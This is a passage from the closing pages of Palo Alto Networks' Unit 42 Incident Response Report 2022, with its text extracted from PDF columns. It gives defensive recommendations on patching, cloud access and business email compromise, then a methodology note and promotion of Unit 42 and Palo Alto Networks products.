• Inventory all IT assets (including storage,
• Evaluate your options for managed security
switches, laptops, etc.) across the entire
services, if you do not have the in-house
distributed organization through automated
expertise, or your cloud estate is particularly
discovery tools to get a clear picture of what you
complex and in a continual state of change.
have to manage.
• Control access to the cloud environment.
• Prioritize your patching needs. Determine which
Access to cloud controls such as CSP consoles,
vulnerabilities represent high, medium, or low
application programming interfaces (APIs), and
risk, and their level of priority for the business
command-line interfaces in the cloud should
according to your organizational risk tolerance:
be restricted to only those who need it. Such
− Supplement that list by researching role-based access control (RBAC) is essential
vulnerabilities for all operating systems, to minimizing risks of configuration and other
applications, etc., and add those to your list of security errors.
priorities to address every month.
• Use MFA for authorized users as well as
− Any vulnerabilities that have published PoC certificates and digital signatures.
code should be considered in the “high” risk
category to fix. • Separate administrative and user credentials and
limit everyday users to production environments.
• Test your patches in a development QA
environment to ensure they won’t “break the • Implement allow listing where possible,
system” once deployed into production. to further limit access to known and
trusted endpoints.
• Have a schedule for deploying patches regularly.
For some companies, that may only be once • Know what data you have in the cloud and where
a month. However, ensure you are able to it is. Regularly audit your cloud data to know what
deploy high-priority patches out of cycle when sensitive data you have and where it’s located.
necessary (such as those for which PoCs have
been published). • Encrypt sensitive data (at a minimum), segment
it, provide access using RBAC and rotate keys
• Once patches are deployed, monitor them for regularly. Evaluate whether maintaining
stability. This may also include monitoring your keys with the cloud provider or within your
network for stability. organization is the best option for you, but ensure
you have a key security policy that limits key
• Remove systems that are running on operating
access and exposure to risk.
systems that are no longer supported.

INCIDENT RESPONSE REPORT 2022 44

APPENDIX

• Ensure file-level operations are logged. It’s important to have visibility

into all historical access and creation/deletion events. Some CSPs don’t
automatically log these events, and logging must be turned on. We
recommend ensuring that appropriate logging tools are activated in
cloud environments.

Recommendations to Prevent Business Email Compromise

• Include training on how to identify and manage fraudulent financial
requests, especially if the request appears to be coming from a valid email
address of a colleague—or even a superior.

• To mitigate the primary method of BEC fraud, ensure that financial

wire transfer verification steps are conducted through non-email
communication channels (e.g., text messages, voice phone calls).

• Limit the number of employees authorized to approve wire transfers and

provide additional training for authorized employees.

• Implement blocking or alerting for auto-forwarding rules that forward

messages externally.

• Create custom retention tags for email that: automatically move older
items to archive; delete items older than a certain age (e.g., five years); and
permanently delete items no longer needed (e.g., those older than seven
years) from both primary and archive mailboxes. Keep in mind, however,
that archival policies should align with compliance requirements.

• Disable legacy authentication (e.g., single-factor POP, IMAP, or

SMTP AUTH).

• Enable enhanced and granular audit logging to increase visibility into

potentially unauthorized activities.

• Configure and enable a DLP solution to prevent users from accidentally (or
intentionally) sharing sensitive information.

Want help preparing for an incident? Call in the experts.

If you have specific concerns about any of the incident types discussed here, believe
you may be under attack; or want tailored recommendations for putting together an
incident response plan or taking other proactive measures—we’d be happy to help.
Please contact us.

The Unit 42 Incident Response team is available 24/7, year-round. If you have cyber
insurance, you can request Unit 42 by name. You can also take preventive steps by
requesting any of our cyber risk management services.

INCIDENT RESPONSE REPORT 2022 45

Methodology In creating this report, we reviewed the
findings from a selection of approximately
600 incident response cases Unit 42
completed between May 2021 and April 2022.
These cases included examples of BEC, ransomware,
insider threat, nation-state espionage, network
intrusions, and inadvertent disclosures. Our clients
spanned the range from small businesses and
organizations with fewer than 50 personnel to Fortune
500 companies and government organizations with
greater than 50,000 employees.

While the majority of cases were located in the U.S.,

the threat actors conducting attacks were located
worldwide, targeting businesses, organizations and
IT infrastructure globally. We supplemented our
case data with in-depth interviews with experienced
security consultants to gather anecdotal and narrative
insights from their work with clients in specific areas
of expertise. Our recommendations and observations
are based on areas where threat actors were largely
successful; as such, the lessons themselves have broad
applicability regardless of region or industry.

INCIDENT RESPONSE REPORT 2022 46

Unit 42 We follow a proven methodology:
Incident Response Scope

Methodology For an accurate understanding of the incident, we know

it’s critical to get the scoping phase right. This allows us
to align the right resources and skill sets to get you back
Every minute an attack remains
on your feet as quickly as possible, and to accurately
unresolved costs you money and can
estimate the level of effort needed to assist you.
damage your reputation. With Unit 42
incident response experts by your side, you Investigate
will jumpstart your investigation and take
We then work to fully understand the incident as we
advantage of our experience responding to
investigate what happened, leveraging the available
thousands of incidents similar to yours. With
data and working alongside your team.
our threat intelligence informed approach to
incident response and advanced tools across Secure
endpoint, network, and cloud, we provide As the incident is contained and the threat actor and
lightning-fast containment to minimize the their tools are eradicated from your environment, we
impact on your business.
concurrently assist your organization with rapidly

Unit 42’s average response time—how long it restoring operations.

takes us to make initial contact after receiving
Support and Report
a request for assistance—is well under 15
Unit 42 will also assist you in understanding the root
minutes. Once called in, we work quickly to
cause and potential impact of the incident, including
understand the full scope of the intrusion,
any unauthorized access or acquisition of sensitive
which systems are impacted, and what security
actions have already been taken so we can information that may trigger legal obligations.

quickly contain the incident. Transform

We believe a key step in incident response is helping
Learn more about Unit 42 ensure an improved security posture going forward.
Incident Response services.
We work with you to apply specific improvements that
will help protect against future and similar attacks.

SCOPE INVESTIGATE SECURE SUPPORT & REPORT TRANSFORM

Define Fully understand the Contain and Findings and response Improve your
engagement scope incident eradicate assistance security posture
Assess the breadth, Our experts use We remove the threat Get a detailed investigation Use lessons learned
severity and nature of advanced tools for with custom eradication report as well as guidance and apply specific
the security incident. evidence collection, strategies and provide in implementing additional improvements to your
detection and analysis 24/7 monitoring against security controls while you security approach to
to flag IoCs, TTPs and new malicious activity. get back on your feet. protect against future
other clues. and similar attacks.

THREAT INTELLIGENCE

INCIDENT RESPONSE REPORT 2022 47

About Palo Alto Networks
Palo Alto Networks is the world’s cybersecurity leader. We innovate
to outpace cyberthreats, so organizations can embrace technology
with confidence. We provide next-gen cybersecurity to thousands of
customers globally, across all sectors. Our best-in-class cybersecurity
platforms and services are backed by industry-leading threat
intelligence and strengthened by state-of-the-art automation.
Whether deploying our products to enable the Zero Trust Enterprise,
responding to a security incident, or partnering to deliver better
security outcomes through a world-class partner ecosystem, we’re
committed to helping ensure each day is safer than the one before. It’s
what makes us the cybersecurity partner of choice.

At Palo Alto Networks, we’re committed to bringing together the very

best people in service of our mission, so we’re also proud to be the
cybersecurity workplace of choice, recognized among Newsweek’s
Most Loved Workplaces (2021), Comparably Best Companies for
Diversity (2021), and HRC Best Places for LGBTQ Equality (2022). For
more information, visit www.paloaltonetworks.com.

Palo Alto Networks has shared these findings, including file samples
and indicators of compromise, with our fellow Cyber Threat Alliance
members. CTA members use this intelligence to rapidly deploy
protections to their customers and systematically disrupt malicious
cyber actors. Visit the Cyber Threat Alliance for more information.

About Unit 42
Palo Alto Networks Unit 42 brings together world-renowned threat
researchers, elite incident responders and expert security consultants
to create an intelligence-driven, response-ready organization
that’s passionate about helping you proactively manage cyber risk.
Together, our team serves as your trusted advisor to help assess
and test your security controls against the right threats, transform
your security strategy with a threat-informed approach and respond
to incidents in record time so that you get back to business faster.
Visit paloaltonetworks.com/unit42.

INCIDENT RESPONSE REPORT 2022 48

Palo Alto Networks Prevent,
Detect, and Respond Capabilities

PREVENT
Secure Access and Minimize Recommended products

the Attack Surface Cortex Xpanse

ZTNA 2.0
Combine fine-grained, least- privileged access
with continuous trust verification and deep,
ongoing security inspection to protect all users,
devices, apps, and data everywhere. Secure
access to implement a system of record to track
every asset, system, and service you own that
is on the public internet, including RDP—a
common initial attack vector.

Prevent Known and Recommended products

Unknown Threats Advanced Threat Prevention
WildFire
To stay ahead of fast-moving and evasive
threats, ML-powered security stops known, Advanced URL Filtering

unknown and zero-day threats in real time DNS Security

to eliminate the initial victim and any future SaaS Security

targets across the attack lifecycle. Seamlessly IoT Security

integrated with Palo Alto Networks’ Next- Next-Generation Firewalls

Generation Firewalls, our Cloud-delivered Virtual Firewalls

Security Services coordinate intelligence to Cloud NGFW for AWS

across all traffic, applications, devices and Containerized Firewalls
users to provide best-in-class protection from
exploits, malware, ransomware, malicious
websites, phishing, spyware, and command and
control (C2) and DNS threats.

INCIDENT RESPONSE REPORT 2022 49

PALO ALTO NETWORKS PREVENT, DETECT, AND RESPOND CAPABILITIES

DETECT
Detect Threats in Real Time Recommended products
Cortex XDR
To safeguard any enterprise, detecting and
WildFire
blocking exploits and evasive attacks with swift
resolution is essential. Cortex XDR® uses machine
learning to profile behavior and detect anomalies
indicative of attack. WildFire® utilizes near
real-time analysis to detect previously unseen,
targeted malware and advanced persistent
threats, keeping your organization protected.

Secure Cloud Workloads Recommended products

Palo Alto Networks helps ensure that all cloud Cloud Workload Protection
infrastructure, Kubernetes, and container images Cloud Code Security
are securely configured, and steps have been Cloud Network Security
taken to minimize vulnerabilities by:

• Detecting and remediating vulnerabilities

and misconfigurations in code repositories,
container images, and infrastructure as code
from DevOps tools.

• Detecting vulnerabilities and

misconfigurations in hosts, containers, and
serverless functions from build to deploy
to run.

• Segmenting services.

INCIDENT RESPONSE REPORT 2022 50

PALO ALTO NETWORKS PREVENT, DETECT, AND RESPOND CAPABILITIES

RESPOND
Stop Lateral Movement and Data Leakage Recommended products
Advanced Threat Prevention
Threat actors, including ransomware actors, must establish
DNS Security
command-and-control and will then typically move laterally
Enterprise Data Loss Prevention
after initial exploitation,. Acting on objectives will often end in
sensitive data extraction. Palo Alto Networks: Identity-Based Microsegmentation

• Blocks 96% of unknown web-based malleable command

and control as well as all known C2

• Stops DNS-based attacks with 40% greater coverage of

threats typically used in data exfiltration attempts that
specifically exploit the DNS protocol.

• Provides visibility into and segments IoT, OT, IT, and

Bluetooth devices.

• Automatically detects and prevents many types of unsafe

transfers of sensitive data against corporate policies.

Automate Response Recommended products

Consider implementing tools that support the automated XSOAR Ransomware Playbooks

remediation of events that leverage pre-made playbooks to XSOAR Marketplace contains many
other playbooks related to incident
respond and recover from incidents.
types discussed in this report.

Reduce Response Time with Retainers

When an attack occurs, there is a material threat to your
business. It is critical to take swift action before the incident
escalates. With a Unit 42 retainer in place, you can make our
incident response experts extensions of your team on speed dial.

You won’t engage in a frantic search for resources either because

you will have an assigned point of contact with knowledge of
your environment and dedicated communication channels for
engaging the team. As a result, you can respond faster and more
accurately should an incident occur to minimize the impact and
get you back to business sooner.

INCIDENT RESPONSE REPORT 2022 51

3000 Tannery Way
Santa Clara, CA 95054

Main: +1.408.753.4000
Sales: +1.866.320.4788
Support: +1.866.898.9087

www.paloaltonetworks.com

© 2022 Palo Alto Networks, Inc. Palo Alto Networks is a registered ­trademark of Palo Alto Networks. A list of our trademarks can be found
at https://www.paloaltonetworks.com/company/trademarks.html. All other marks mentioned herein may be trademarks of their respective
companies. 2022 Unit 42 Incident Response Report 07/2022